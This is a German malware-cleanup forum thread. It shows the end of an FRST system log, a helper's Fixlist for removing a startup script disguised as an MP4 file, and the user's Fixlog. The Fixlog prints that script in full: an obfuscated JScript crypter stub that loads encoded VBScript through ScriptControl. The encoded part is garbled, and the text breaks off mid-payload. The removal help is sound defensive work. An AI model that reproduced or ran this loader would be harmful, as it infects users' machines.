der der Hauptsuchdienst der Domäne für den NetBT_Tcpip_{9AC5FAFD-36B5-46D0-995A-B1A01FC0C8D9}-Transport zu sein scheint.
Der Hauptsuchdienst wurde beendet oder es wird eine Auswahl erzwungen.

Error: (04/09/2016 05:36:39 PM) (Source: bowser) (EventID: 8003) (User: )
Description: Der Hauptsuchdienst erhielt eine Serverankündigung vom Computer "EASYBOX",
der der Hauptsuchdienst der Domäne für den NetBT_Tcpip_{9AC5FAFD-36B5-46D0-995A-B1A01FC0C8D9}-Transport zu sein scheint.
Der Hauptsuchdienst wurde beendet oder es wird eine Auswahl erzwungen.


CodeIntegrity:
===================================
  Date: 2016-04-09 18:31:52.922
  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\ComboFix\catchme.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

  Date: 2016-04-09 18:31:52.844
  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\ComboFix\catchme.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

  Date: 2015-09-14 19:19:01.425
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\SSD\Windows\WinSxS\x86_microsoft-windows-cloudstoragewizard_31bf3856ad364e35_6.3.9600.17415_none_895a2497a8f7a9b7\CloudStorageWizard.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-14 19:19:01.314
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\SSD\Windows\WinSxS\x86_microsoft-windows-cloudstoragewizard_31bf3856ad364e35_6.3.9600.17415_none_895a2497a8f7a9b7\CloudStorageWizard.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-14 19:19:01.206
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\SSD\Windows\WinSxS\x86_microsoft-windows-cloudstoragewizard_31bf3856ad364e35_6.3.9600.17415_none_895a2497a8f7a9b7\CloudStorageWizard.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-14 19:19:01.082
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\SSD\Windows\WinSxS\x86_microsoft-windows-cloudstoragewizard_31bf3856ad364e35_6.3.9600.17415_none_895a2497a8f7a9b7\CloudStorageWizard.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-14 19:03:02.715
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\SSD\Windows\WinSxS\amd64_sonicwall-vpnplugin-appx_31bf3856ad364e35_6.3.9600.16408_none_b7740c49e0650820\MobileConnectVpnPluginApp.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-14 19:03:02.704
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\SSD\Windows\WinSxS\amd64_sonicwall-vpnplugin-appx_31bf3856ad364e35_6.3.9600.16408_none_b7740c49e0650820\MobileConnectVpnPluginApp.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-14 19:03:02.698
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\SSD\Windows\WinSxS\amd64_sonicwall-vpnplugin-appx_31bf3856ad364e35_6.3.9600.16408_none_b7740c49e0650820\MobileConnectVpnPluginApp.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-14 19:03:02.691
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\SSD\Windows\WinSxS\amd64_sonicwall-vpnplugin-appx_31bf3856ad364e35_6.3.9600.16408_none_b7740c49e0650820\MobileConnectVpnPluginApp.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.


==================== Speicherinformationen =========================== 

Prozessor: AMD FX(tm)-4100 Quad-Core Processor 
Prozentuale Nutzung des RAM: 17%
Installierter physikalischer RAM: 16341.65 MB
Verfügbarer physikalischer RAM: 13462.5 MB
Summe virtueller Speicher: 32681.5 MB
Verfügbarer virtueller Speicher: 30058.06 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:931.41 GB) (Free:102.54 GB) NTFS
Drive d: (FREECOM HDD) (Fixed) (Total:931.51 GB) (Free:81.67 GB) NTFS
Drive f: () (Fixed) (Total:218.94 GB) (Free:189.14 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]
Drive g: (System-reserviert) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]
Drive h: (Media) (Fixed) (Total:3725.9 GB) (Free:180.97 GB) NTFS
Drive i: (Festplatte) (Fixed) (Total:931.51 GB) (Free:401.13 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]
Drive l: (World of Goo) (CDROM) (Total:0.07 GB) (Free:0 GB) CDFS
Drive o: () (Removable) (Total:0.98 GB) (Free:0.06 GB) FAT
Drive r: () (Fixed) (Total:19.53 GB) (Free:19.48 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: A83AA10F)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 3726 GB) (Disk ID: 00000000)

Partition: GPT.

========================================================
Disk: 2 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 21019E80)
Partition 1: (Active) - (Size=218.9 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=19.5 GB) - (Type=07 NTFS)

========================================================
Disk: 3 (MBR Code: Windows XP) (Size: 931.5 GB) (Disk ID: A2557FE6)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

========================================================
Disk: 8 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 21019E81)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

========================================================
Disk: 9 (Size: 1008.8 MB) (Disk ID: 001B25E3)
Partition 1: (Active) - (Size=1009 MB) - (Type=06)

==================== Ende von Addition.txt ============================

deeprybka · 09.04.2016, 18:38

Schritt 1

Drücke bitte die

+ R Taste und schreibe notepad in das Ausführen Fenster.
Klicke auf OK und kopiere nun den Text aus der Codebox in das leere Textdokument:

Code:

ATTFilter

CloseProcesses:
cmd: type "C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID-20151943-WA0114.MP4.js"
HKLM-x32\...\Run: [VID-20151943-WA0114] => wscript.exe //B "C:\Users\Ben\AppData\Local\Temp\VID-20151943-WA0114.MP4.js"
Startup: C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\errorlog.txt [2016-04-09] ()
Startup: C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID-20151943-WA0114.MP4.js [2015-09-10] ()
Task: {8BDB1E7F-123A-435D-B18A-03F6370F5DC6} - System32\Tasks\{C7F79A47-BAF5-43D4-B22B-CDE1C0D44458} => 
Task: {C61C6295-3FA7-43FE-8A97-A41503664FF1} - System32\Tasks\{76A2D95E-7B3C-41FD-B8E2-209053DBD3C0} => 
Task: {E196A98F-38A4-49E5-958B-6CFEFAFFB8BD} - System32\Tasks\{AE712D40-D949-47B4-8608-487122F4C8DA} =>

Speichere dieses bitte als Fixlist.txt in das Verzeichnis ab, in dem sich auch die FRST-Anwendung befindet.

Starte FRST und drücke auf den Entfernen-Button.
Das Tool erstellt eine "Fixlog.txt" -Datei.
Poste mir bitte deren Inhalt.

Buggerns · 09.04.2016, 18:50

Interessante Art den Editor zu öffnen =)

Code:

ATTFilter

Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
durchgeführt von Ben (2016-04-09 19:44:40) Run:1
Gestartet von C:\Users\Ben\Desktop
Geladene Profile: Ben (Verfügbare Profile: Ben)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
CloseProcesses:
cmd: type "C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID-20151943-WA0114.MP4.js"
HKLM-x32\...\Run: [VID-20151943-WA0114] => wscript.exe //B "C:\Users\Ben\AppData\Local\Temp\VID-20151943-WA0114.MP4.js"
Startup: C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\errorlog.txt [2016-04-09] ()
Startup: C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID-20151943-WA0114.MP4.js [2015-09-10] ()
Task: {8BDB1E7F-123A-435D-B18A-03F6370F5DC6} - System32\Tasks\{C7F79A47-BAF5-43D4-B22B-CDE1C0D44458} => 
Task: {C61C6295-3FA7-43FE-8A97-A41503664FF1} - System32\Tasks\{76A2D95E-7B3C-41FD-B8E2-209053DBD3C0} => 
Task: {E196A98F-38A4-49E5-958B-6CFEFAFFB8BD} - System32\Tasks\{AE712D40-D949-47B4-8608-487122F4C8DA} =>
         
*****************

Prozess erfolgreich geschlossen.

=========  type "C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID-20151943-WA0114.MP4.js" =========

//<S A F A 7 _ 2 2  C r y p t e r v7.3>
 var wSh = new ActiveXObject(String.fromCharCode(87)+String.fromCharCode(83)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(83)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(108)+String.fromCharCode(108)+"");
try{
var scVB = new ActiveXObject( String.fromCharCode(83)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(67)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(116)+String.fromCharCode(114)+String.fromCharCode(111)+String.fromCharCode(108)+"" );
}catch(e){
	var wsh32 = WScript.FullName.replace(/system32/i,String.fromCharCode(83)+String.fromCharCode(121)+String.fromCharCode(115)+String.fromCharCode(87)+String.fromCharCode(79)+String.fromCharCode(87)+String.fromCharCode(54)+String.fromCharCode(52)+"");
	wSh.Run("\""+wsh32+"\" \""+WScript.ScriptFullName+"\"",4,false);
	WScript.Quit(0);
}finally {
scVB.Language = String.fromCharCode(86)+String.fromCharCode(66)+String.fromCharCode(83)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+""
scVB.AddObject(String.fromCharCode(87)+String.fromCharCode(83)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+"", WScript);
scVB.Timeout = -1 ;
scVB.Addcode("dim s_178217022751")
scVB.Addcode("s_178217022751="+String.fromCharCode(34)+"����???????��???????�?��?????��???????�??ή��䝶�����??????��������������㶕��????���????����????�???��????��ו�??????????����????���???????��????��?????????��????���"+String.fromCharCode(34))
scVB.Addcode("dim s_17821702275201")
scVB.Addcode("s_17821702275201="+String.fromCharCode(34)+"������??????�???������������㶕��???�????????��???�????????��???????�????????????��???????�?????확�???�?????????????��???�?????????????��????????????��?????????�????????????????�"+String.fromCharCode(34))
scVB.Addcode("dim s_17821702275401")
scVB.Addcode("s_17821702275401="+String.fromCharCode(34)+"��???�???????��???�???????��????????????��?????֥???????확��䝶�����??????�???�����������㶕��???????????��???????�??????????��???????��????????�??????????????��???????������"+String.fromCharCode(34))
scVB.Addcode("dim s_17821702275601")
scVB.Addcode("s_17821702275601="+String.fromCharCode(34)+"�??????????��????????�????????????????????????�??????????�������??�???�?????????????�????????????�??????????��????��??????????��????????�????????????????????????���????��������???????���������"+String.fromCharCode(34))
scVB.Addcode("dim s_17821702275801")
scVB.Addcode("s_17821702275801="+String.fromCharCode(34)+"?�������?????��������???�????????��???�???��???�?????��????�����????????????�����?????????�����???�???????��䝶�����????�?????�����������㶕�??�?????�??????�????����???????"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022751001")
scVB.Addcode("s_178217022751001="+String.fromCharCode(34)+"?��?????�????���???????���????????�����????????��????��??�?????���확�???��?????�????????�???????���??????�????�???�ؙ��????��????????��������?????��???�י��������???????�?????��????��????"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022751201")
scVB.Addcode("s_178217022751201="+String.fromCharCode(34)+"??��������?????��???�י��������???????�?????��������???�???????���?????????????�????????????�??????????���???????????�����?????���������???????�?????�?????��������???????�?????��������????????�??"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022751401")
scVB.Addcode("s_178217022751401="+String.fromCharCode(34)+"?��???????�???��ѫ�����???��ә���??????????���???????????���???��ә��������???????�????��????��?????????��������?????????��????��????��������????????�???�י�???�֙��????��????�????��������??????"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022751601")
scVB.Addcode("s_178217022751601="+String.fromCharCode(34)+"????????�???�י�???�֙��????��????��������?????��???�י��������??????�?????���????���????�??????��������????��??�????�??????��??????????���????���????�???��������?????��???�י��������????��"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022751801")
scVB.Addcode("s_178217022751801="+String.fromCharCode(34)+"??�????�???��???????�?????���????���????�???????��������????��??�????�???????��???????????����????���???�?????��������?????��???�י��������????��??�???�?????��????????�?????����????���??????�"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022752001")
scVB.Addcode("s_178217022752001="+String.fromCharCode(34)+"�������?????��???�י��������?????????�?????���????���????�???????��������?????��???�י��������???????????�?????���????���?????��������?????��???�י��������?????��????�?????����������???"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022752201")
scVB.Addcode("s_178217022752201="+String.fromCharCode(34)+"�??????���???????�?????�?????���????����???�???????��??�?????�??????�????��???�??????��???�????????��???�??????????��???�????????��???�??????????���???????��???�????�?????�??�?????????????�??????"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022752401")
scVB.Addcode("s_178217022752401="+String.fromCharCode(34)+"���??��?????�???????��????�????��??��?????�?????????�����????��??��?????�?????????�����????������?????????????�????????�???????�??????????????���?????�????��������???????????�????������??��??????"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022752601")
scVB.Addcode("s_178217022752601="+String.fromCharCode(34)+"???????�??????????�?????�????��������???????????���????����������?????????????�???????�?????�????���������???????????��??????????����ӕ�����???�??������???�????�????�??�?????????????�?????????��??"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022752801")
scVB.Addcode("s_178217022752801="+String.fromCharCode(34)+"???�????�����ᙥ�????����������??�???�???????�????�????�???����������??��?????�????�????����????��������������??��?????�?????�????�????�����??????�?????�????�????���홙���ǵ��???��????�������"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022753001")
scVB.Addcode("s_178217022753001="+String.fromCharCode(34)+"�����������????�??????????����ӕ�����������������??��?????�????�????��ǵ�?????�???????????��????����������������������????????��?????�????�????��확���������������������???�??????��????????�????"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022753201")
scVB.Addcode("s_178217022753201="+String.fromCharCode(34)+"??????????�?????�????���������????????�ؙ����???�����������������������??????�???????????��ԕ���������������������??????�??????????���???�???����������������������??????�????????????????����"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022753401")
scVB.Addcode("s_178217022753401="+String.fromCharCode(34)+"����������������������??????�?????????����?�?????�����???????�???????????������????��ә���������????��ә������?????�����???????�????�????������????��ә���������????��ә�����????���������������������"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022753601")
scVB.Addcode("s_178217022753601="+String.fromCharCode(34)+"�????????��????????�???????�����������������????????�???????�����????????�???????�����������������????????�???????������?????�????�????���홞??????�?????�????�????���홙���������??????"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022753801")
scVB.Addcode("s_178217022753801="+String.fromCharCode(34)+"?????������������������������??��?????�????????��������????��������������������������??????�????????????��????�????����������������������????��������������������������??????�????????????��????"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022754001")
scVB.Addcode("s_178217022754001="+String.fromCharCode(34)+"????����������������������???�??����������������������??????�????��������������������???�??��������������???�??����������???�??������????������???�????�??????�??�?????????????�?????????��?????�????���"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022754201")
scVB.Addcode("s_178217022754201="+String.fromCharCode(34)+"��ᙥ??????????����������??�???�?????????�????�????�???����������??????�??????????����ӕ���������??????????��??????�????����������???�??????��????????�??????????????�?????�????���������?????????"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022754401")
scVB.Addcode("s_178217022754401="+String.fromCharCode(34)+"?����???�����������??????�???????????��ԕ���������??????�??????????���???�???����������??????�????????????????�������������??????�?????????����?�?????�����???????�???????????������????��ә���"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022754601")
scVB.Addcode("s_178217022754601="+String.fromCharCode(34)+"������????��ә������?????�????????�����???????�??????�????������????��ә���������????��ә�����????����������??????????��????????�???????�����������������????????�???????�??????�???????????���"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022754801")
scVB.Addcode("s_178217022754801="+String.fromCharCode(34)+"���������??��?????�??????????��������????��������������??????�????????????��??????�????����������????��������������??????�????????????��??????????����������???�??����������??????�????��������???"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022755001")
scVB.Addcode("s_178217022755001="+String.fromCharCode(34)+"?��???��?��???��?��???�??��????��???�?????��???�???���???�?????????��??�?????�??????�????��???�????????��???�??????????���????????�?????????����������������????????�?????????�???????�???????????"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022755201")
scVB.Addcode("s_178217022755201="+String.fromCharCode(34)+"???�???�����?????�???????????��홞ؙ��????????�?????????�����������������????????�?????????�???????�??????????????�???�����?????�???????????��홞ؙ��?????????????�??????????�???????���????????"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022755401")
scVB.Addcode("s_178217022755401="+String.fromCharCode(34)+"???��????��?????????????�??????????�???????�??????????????��????���???��????�?????�??�?????????????�??????��??��?????�???????��????�????��??��?????�?????????�����????��??��?????�?????????�����????"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022755601")
scVB.Addcode("s_178217022755601="+String.fromCharCode(34)+"������???��????�????�??�?????????????�?????????��?????�????����홥?????�����������??�?????�??????�????�����������??��?????�????�????����????���������������??��?????�?????�????�????���홞??????�"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022755801")
scVB.Addcode("s_178217022755801="+String.fromCharCode(34)+"?????�????�????���홙���ǵ��???��????�������������������????�??????????��ؕ������������������??��?????�????�????��ǵ�?????�???????????��????�����������������������????????��?????�????�????��확�"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022756001")
scVB.Addcode("s_178217022756001="+String.fromCharCode(34)+"���������������������?????????????�??????????�?????�????��������????????�ؙ����???�ᙕ������������������????�����������������������?????????????�??????????�?????�????��������????�????������������"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022756201")
scVB.Addcode("s_178217022756201="+String.fromCharCode(34)+"��������???��?���������������????�������������������?????????????�??????????�????�????����������������???�??�����������???�??�������????�������???�????�??????�??�?????????????�?????????��?????�????�"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022756401")
scVB.Addcode("s_178217022756401="+String.fromCharCode(34)+"����ᙥ??????????�����������??????�??????????��ؕ������????��???�??��???�??��???�??��????��???????�????��???�???���????????�????�???��?????����????��?????��???????�????��????���????�������????��"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022756601")
scVB.Addcode("s_178217022756601="+String.fromCharCode(34)+"������????��������???��?????��???????�????????????????��????�?????���???????????��???????�????�?????��????��???????�????????????��???�????????���????????�???????????��??�?????�??????�????��??��???�"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022756801")
scVB.Addcode("s_178217022756801="+String.fromCharCode(34)+"�����????������???��????���???????������???��???����????????�????????????????????????���????????????�����???????������???��???����????????�????????????????????????���????????�����???????������"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022757001")
scVB.Addcode("s_178217022757001="+String.fromCharCode(34)+"�???�????��?????????��????????�???????????????????�????????????蜜��????�????�확�����???�??��????�?????????��??????���????�???���???????????????확�����???�????�??????�??�??���������???��???���??"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022757201")
scVB.Addcode("s_178217022757201="+String.fromCharCode(34)+"????�???????���???????����������????�???������????������???��???����????����???????������???��???���????????���???????������???��???���????????????������???????????��???���????������???????????�"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022757401")
scVB.Addcode("s_178217022757401="+String.fromCharCode(34)+"��???��???�??��???�????????����???�???????យ��??�?????�??????��???���????????�????????����������������????????�?????????�???????�??????????????�???�����?????�???????????��홞ؙ����???????�??"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022757601")
scVB.Addcode("s_178217022757601="+String.fromCharCode(34)+"?��ѫ�����????��ә���??????????���???????????���????��ә�����������????????�????????�����������������????????�?????????�???????�??????????????�???�����?????�???????????��홞ؙ����???????�???��"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022757801")
scVB.Addcode("s_178217022757801="+String.fromCharCode(34)+"ѫ������????��ә���??????????���???????????���????��ә�����������?????????????�????????�???????�??????????????�??????????���???????????�????��?????????????�????????�???????�??????????????�???????���"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022758001")
scVB.Addcode("s_178217022758001="+String.fromCharCode(34)+"???????????��????���???�???����????????�????��??�?????�??????�????���???�????��?????????��????????�???????????????????�????????????蜜��????�????�확�???�?????��????�?????????��??????���????�??"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022758201")
scVB.Addcode("s_178217022758201="+String.fromCharCode(34)+"?���???????????확�???�????�????�??�?????������??��????�??????????????????�ǵ����????����������????��????�??????????????????����������????�???������???�??��????��???�????????����????????�????????�"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022758401")
scVB.Addcode("s_178217022758401="+String.fromCharCode(34)+"�??�?????�??????�????���????????������???�?????????????��?????????��????????�???????????????????�????????????蜜��????�????�확�???�????????��?????????????�?????????��??????���????�???���???????"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022758601")
scVB.Addcode("s_178217022758601="+String.fromCharCode(34)+"????????���Ӏ���???�????�???????�??�????????������??????????��?????�???????�???????��확�????��??????????��?????�????????�???????��확�?????????��??????????�ؙ������???��?����??�??????�???"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022758801")
scVB.Addcode("s_178217022758801="+String.fromCharCode(34)+"???????����?????????��?????????����??????????�?���????��?????????��????�?????????���??��?????????���????�??���??????????????���????�??���??????????????���???�?????????????????��?????????��"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022759001")
scVB.Addcode("s_178217022759001="+String.fromCharCode(34)+"????????���?????????�????�����??���??�????????????��?????????????????�?????????��??????���????�????????????????���???��ؙ���???�????�????????????�??�????????????������????????���????????����??????"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022759201")
scVB.Addcode("s_178217022759201="+String.fromCharCode(34)+"??????�???????????�������????��??�????????������????�????????����???�??��???�????????����????????�????????��??�?????�??????�????���????????????��????????�???????�����������������????????"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022759401")
scVB.Addcode("s_178217022759401="+String.fromCharCode(34)+"�����?????�???????????��홞ؙ����확�??�????????????�����????�����??�?????��???�???????�??????????????�֙���폜�����?????�???????????��????��������????????????���????�������????��������????????"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022759601")
scVB.Addcode("s_178217022759601="+String.fromCharCode(34)+"�????????�����������������????????�����?????�???????????��홞ؙ���������????????????�������������????��������????????????���?????�������????��������????????�????????�����������������????"+String.fromCharCode(34))
scVB.Addcode("dim s_178217022759801")
scVB.Addcode("s_178217022759801="+String.fromCharCode(34)+"????�����?????�???????????��홞ؙ���������????????????��������������???�??��???��?�����???????��???�???????????????????���?????????????�???????�???????�??????????????���???�????????????????"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227510001")
scVB.Addcode("s_1782170227510001="+String.fromCharCode(34)+"????���?????????????�???????�??????????���???????????���??��?????�???????????????????�?????????��ǵ�?????�????????????????????�?????????��????������????????�???��???????�???��ѫ�����???��ә���???"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227510201")
scVB.Addcode("s_1782170227510201="+String.fromCharCode(34)+"???????���???????????���??��ә������???????�????��???��?��???�?????��???�???????��?????????????�????????????�??????????���???????????����?????���??��???�??????����????�???????�????��???�????????"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227510401")
scVB.Addcode("s_1782170227510401="+String.fromCharCode(34)+"����???�??????????????�???????�????????����???????��???????��?????????��??????????���????????��???�???????????????��????????????��?????֥???????�ᙕ�???????????????�????��???���???????��?????��"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227510601")
scVB.Addcode("s_1782170227510601="+String.fromCharCode(34)+"???????????????�????���???�??????????????��????????????��?????????�????????????????확�??��??????????????�??????????�?????????��????������??????????????�??????????�?????????���???�??����??�?????"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227510801")
scVB.Addcode("s_1782170227510801="+String.fromCharCode(34)+"??????????�??????������????�����???��?????????????????�����???��?????????????????��????????????��?????�??????확����????�?????????????????�䔔�????����䔔�????�䔔�?????�???????????????�??????????"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227511001")
scVB.Addcode("s_1782170227511001="+String.fromCharCode(34)+"??�䔔�??????????�?????????�䔔�?????�����???�????�����???�?????????????????��???????��???�??��??�??????????????�??????????�?????????��????�����????????�???�??????????????�???????�?????????��???????"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227511201")
scVB.Addcode("s_1782170227511201="+String.fromCharCode(34)+"??��???�??��???�???���???�????????�???????�???????����??�???????�����????�����???????��??????????��???�??���?????????��???????���???�???????��????????�???????������י��???�???????????????"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227511401")
scVB.Addcode("s_1782170227511401="+String.fromCharCode(34)+"��????????????��?????֥???????확�???????????????�????��????���????�������????��������????���������??�???????����???????���???????��?????��???????????????�????����������???�??????????????��??????"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227511601")
scVB.Addcode("s_1782170227511601="+String.fromCharCode(34)+"??????��?????????�????????????????확�??��??????????????�??????????�?????????��????������??????????????�??????????�?????????���???�??��??��???????????????�??????������????������???��??????????????"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227511801")
scVB.Addcode("s_1782170227511801="+String.fromCharCode(34)+"???��???��?????????????????��????????????��?????�??????확�����????�?????????????????�䔔�????����䔔�????�䔔�?????�???????????????�????????????�䔔�??????????�?????????�䔔�?????��???�???"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227512001")
scVB.Addcode("s_1782170227512001="+String.fromCharCode(34)+"?������???�?????????????????���???????��???�??��??�??????????????�??????????�?????????��????�����????????�???�??????????????�???????�?????????��?????????��???�??��???�???����????????�??????�????"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227512201")
scVB.Addcode("s_1782170227512201="+String.fromCharCode(34)+"???����???��???????�????????????????�??????��???��????????????????��????????????��?????�??????확�????�????????????????�������????����������????���????????????�???????���??????��????���?"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227512401")
scVB.Addcode("s_1782170227512401="+String.fromCharCode(34)+"????��???�????��???�?????????????????��???????��???�???????��????????????��?????֥???????확�???????�????��????���????�������????��������????���������??�???????����???????���???????��?????��???????"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227512601")
scVB.Addcode("s_1782170227512601="+String.fromCharCode(34)+"�????�??????��???�????????����????????�??????????យ���???��????�?????�??�?????????????�??????��??���?????�???????��????�????�������??????????��??????????���?????�????����?����?????�?????????���?"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227512801")
scVB.Addcode("s_1782170227512801="+String.fromCharCode(34)+"??????��???�??��????��???��???????���????????�???????�???????����???????��???????���???????��???��????�??????�??�?????????????�?????????�???????��??????????�������???????��???????���??????�????�"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227513001")
scVB.Addcode("s_1782170227513001="+String.fromCharCode(34)+"���?����������?�����?�����?����??????�??????????���???????��????���???��????�????�??�?????????????�?????????�???????��?????�������???????��???????���????�????����?����????�????�����?�����?�����?���"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227513201")
scVB.Addcode("s_1782170227513201="+String.fromCharCode(34)+"�????�??????????���???????���????��???�????????����????????�???????????យ���??�?????�??????�????���???�?????????????��?????????��????????�����????�????�확�???�????????��?????????????�????????"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227513401")
scVB.Addcode("s_1782170227513401="+String.fromCharCode(34)+"?��??????���????�???���???????���Ӏ����???�???????��???�????�???????�??�????????��???????????��???????????���???????�????����?��???????????��???????????���???????�?????????����?������??????????"+String.fromCharCode(34))
scVB.Addcode("dim s_1782170227513601")
scVB.Addcode("s_1782170227513601="+String.fromCharCode(34)+"?��???????????���???????�??????????????���???????��????��???�????????���???�???????????�???���??�?????�??????�????���????????�???��????????����Ѯ���������???���????��???�???���???�?????????�???"+String.fromCharCode(34))
